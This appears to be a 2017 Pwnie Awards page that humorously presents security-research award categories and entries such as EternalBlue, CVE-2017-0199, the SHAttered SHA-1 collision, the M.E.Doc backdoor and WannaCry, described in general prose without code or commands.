Pwnie for Best Server-Side Bug
Awarded to the researchers who discovered or exploited the most technically sophisticated and interesting server-side bug. This includes any software that is accessible remotely without using user interaction.
These vulnerabilities allow arbitrary remote command execution on Microsoft Operating Systems running the SMB file sharing protocol, which is pretty much all MSFT systems. The vulnerabilities became known as a result of the Shadow Brokers release of (allegedly) the NSA's ETERNAL* exploits, which include variations for different OS versions and functions. Multiple ransomware platforms have taken advantage of these vulnerabilities, causing Microsoft to release patched for unsupported systems such as Windows XP.
Pwnie for Best Client-Side Bug
Awarded to the researchers who discovered or exploited the most technically sophisticated and interesting client-side bug.
In an instance of parallel discovery, two different flaws were identified in how Microsoft Office handles linked OLE objects. CVE-2017-0199 refers to both issues, the first related to the URL Moniker, which can be used to load arbitrary HTA payloads via OLE (and RTF) documents, and the other to the Script Moniker, which can be abused in PowerPoint documents via custom actions. Haifei Li reported the Script Moniker vector and Ryan Hanson the URL Moniker while an unknown party was actively exploiting the URL Moniker issue with spear phishing attacks.
These bugs were interesting from a timing perspective (at least three different folks discovering them in parallel) and due to the fact that they were perfectly effective against Windows 10 and Office 2016, bypassing all memory-based attack mitigations. Since the publication of these issues, both vectors have become favorites of penetration testers and random blackhats alike.
Haifei Li & Bing Sun's presentation at the SYSCAN360 Seattle conference pointed out that Microsoft's patch may not be complete, as it blacklists two COM controls, but exploitable may be possible through third-party controls instead.
Pwnie for Best Privilege Escalation Bug
Awarded to the researchers who discovered or exploited the most technically sophisticated and interesting privilege escalation vulnerability. These vulnerabilities can include local operating system privilege escalations, operating system sandbox escapes, and virtual machine guest breakout vulnerabilities.
Mobile computing row hammer attacks (MC Hammers, for short) are terrifying. You can't touch them and can only hope that, please, they won't hurt you.
Pwnie for Best Cryptographic Attack (new for 2016!)
Awarded to the researchers who discovered the most impactful cryptographic attack against real-world systems, protocols, or algorithms. This isn't some academic conference where we care about theoretical minutiae in obscure algorithms, this category requires actual pwnage.
The SHAttered attack team generated the first known collision for full SHA-1. The team produced two PDF documents that were different that produced the same SHA-1 hash. The techniques used to do this led to an a 100k speed increase over the brute force attack that relies on the birthday paradox, making this attack practical by a reasonably (Valasek-rich?) well funded adversary. A practical collision like this, moves folks still relying on a deprecated protocol to action.
Pwnie for Best Backdoor
Awarded to the researchers who introduced or discovered the most subtle, technically sophisticated, or impactful backdoor in widely used software, protocols, or algorithms.
To prepare their taxes, folks the world over install janky software developed for a captive market of their nation's tax laws. In Ukraine, accountants who installed M.E.Doc received a backdoor in the gig and a half of their full installation. The backdoor used M.E.Doc's own servers for command and control, allowing the network operator to target commands to publicly known tax identification numbers! And yes, this is the alleged patient zero for the NotPetya ransomware that appeared in June, just before Ukraine's Constitution Day.
Pwnie for Best Branding
Sometimes the most important part of security research is how you market and sell the vulnerability you discovered. Who cares how impactful the actual vulnerability is, what matters is how sweet your logo turns out!
Ghostbutt (CVE-2017-8291) has it all, a website, a clever logo, made even cleverer byhaving the logo be the exploit and, of course, the use of the -butt suffix (ala threatbutt). It doesn't have a online store, but[t] it does have a song.
Pwnie for Epic Achievement (new for 2016!)
Awarded to the researchers, attackers, defenders, executives, journalists, nobodies, randos, or trolls for pulling off something so truly epic that we couldn't possibly have predicted it by creating an award category that did it justice.
Exploits possible due to an ioctl named TIOCSTI have been documented by luminairies such as Theo de Raadt since the 80's, but the work of Federico Bento may well have finally influenced the powers that be to put their weight behind addressing it. TIOCSTI allows unprivileged users to insert characters into the terminal's input buffer allowing easy unprivileged to privileged escapes. Federico has been reporting a stream of vulnerabilities based on TIOCSTI, and subsequently OpenBSD, SELinux, Android, and grsecurity have finally acted to remove, block or restrict its use.
Pwnie for Most Innovative Research
Awarded to the person who published the most interesting and innovative research in the form of a paper, presentation, tool or even a mailing list post.
Pwnie for Lamest Vendor Response
Awarded to the vendor who mis-handled a security vulnerability most spectacularly.
Where you are dereferencing null pointers, or writing out of bounds, or not supporting fully qualified domain names, or giving root privileges to any user whose name begins with a number, there's no chance that the CVE number will referenced in either the change log or the commit message. But CVEs aren't really our currency any more, and only the lamest of vendors gets a Pwnie!
Pwnie for Most Over-hyped Bug
Awarded to the person who discovered a bug resulting in the most hype on the Internets and in the traditional media. Extra points for bugs that turn out to be impossible to exploit in practice.
A vulnerability in the way cryptsetup unlocks LUKS encrypted partitions allowed attackers with physical access an initrd shell. This may allow an attacker to load some non desired OS or delete data. For very special machines, like ATMs, kiosks, etc, this might be a problem.
This attack was covered in threatpost and slashdot. However, even the slashdot commenters, in their great wisdom, figured out that it wasn't a big deal.
Not hyped excessively but does require physical access and doesn't even get you real shell.
Pwnie for Best Song
What kind of awards ceremony does not have an award for best song?
As a cover of Adele's Hello, this song added an extra element of stagecraft to a presentation on a cache-based covert channel, in both describing the attack and being the content delivered over the covert channel.
Pwnie for Most Epic FAIL
Sometimes giving 110% just makes your FAIL that much more epic. And what use would the Internet be if it wasn't there to document this FAIL for all time? This award is to honor a person or company's spectacularly epic FAIL.
Everyone wants to stop criminals. In a legislative effort to force vendors to hand over the plaintext contents of encrypted communications, Prime Minister Malcom Turnbull was confronted with the pesky laws of mathematics; that is, that with properly implemented crypto, no one, including vendors, could simply decrypt the user data. Turnbull replied "Well the laws of Australia prevail in Australia, I can assure you of that. The laws of mathematics are very commendable, but the only law that applies in Australia is the law of Australia". Finally, some progress in the war on math!
Lifetime Achievement Award
Most hackers have the personality of a supermodel who does discrete mathematics for fun. Like mathematicians, hackers get off on solving very obscure and difficult to even explain problems. Like models, hackers wear a lot of black, think they are more famous than they are, and their career effectively ends at age 30. Either way, upon entering one's third decade, it is time to put down the disassembler and consider a relaxing job in management.
Felix "FX" Lindner
FX has been around forever, in the most positive sense of the phrase.
He is the epitome of 'applied' security research. Where the work he has shared as an individual, with Phoenolit, and at his co mpany Recurity,. all share the characteristics of being tremendously applicable in the real world.
FX is an expert reverse engineer, a security architect, and a prolific vulnerability researcher across a range of technical ar eas ranging from datalink and network layer exploitation all the way to presentation and application (Blitzablieter anyone?).
Similar to another famous hacker group, FX reached out to government in his country and where the government was doing things in the best interest of it's citizens (including hackers), FX helped to educate them so they could make more informed decision s that would have greater benefit for all.
Felix is always willing to share his knowledge, mentor others, and support and contribute to the evolution of 'the security re searcher'.
Last year, Felix suffered an aneurysm and is continuing his trek towards recovery. The security field owes a lot to you FX. We miss you. Get better soon!
PS - he even has a CISSP, and yet here we are still considering him for this award. That tells you how awesome FX really is <wink>!
Pwnie for Epic 0wnage
0wnage, measured in owws, can be delivered in mass quantities to a single organization or distributed across the wider Internet population. The Epic 0wnage award goes to the hackers responsible for delivering the most damaging, widely publicized, or hilarious 0wnage. This award can also be awarded to the researcher responsible for disclosing the vulnerability or exploit that resulted in delivering the most owws across the Internet.
There was a tie for the winner this year. We'll let them sort it out amongst themselves.
Shutting down German train systems and infrastructure was Childs play for WannaCry. Take a legacy bug that has patches available, a leaked ("NSA") 0day that exploits said bug, and let it loose by a country whose offensive cyber units are tasked with bringing in their own revenue to support themselves and yes, we all do wanna cry.
An Internet work that makes the worms of the late 1990s and early 2000s blush has it all: ransomware, nation state actors, un-patched MS Windows systems, and copy-cat follow on worms Are you not entertained?!?!?
Right before the NSA could launch an attack against Russia as payback for actions that had been identified during the presidential election (and probably payback for some other things we aren't allowed to know), they get iced. Kapow! Out of the blue comes a "hacking group" claiming to have the Fort's full kit!
What would you do? Either the Shadow Brokers are bluffing (and they dumped just enough of the kit that they may not be), or you are walking into a trap because someone out there has part of your playbook!
Part of this nomination goes to Shadow Brokers for having the kit in the first place, the other part of this nomination goes to the delivery, timing, and false flag auction.
Welcome to behind the green door and a glimpse at the great game everyone!
Bonus points for subsequent ransomware worms lifting parts of the released kit.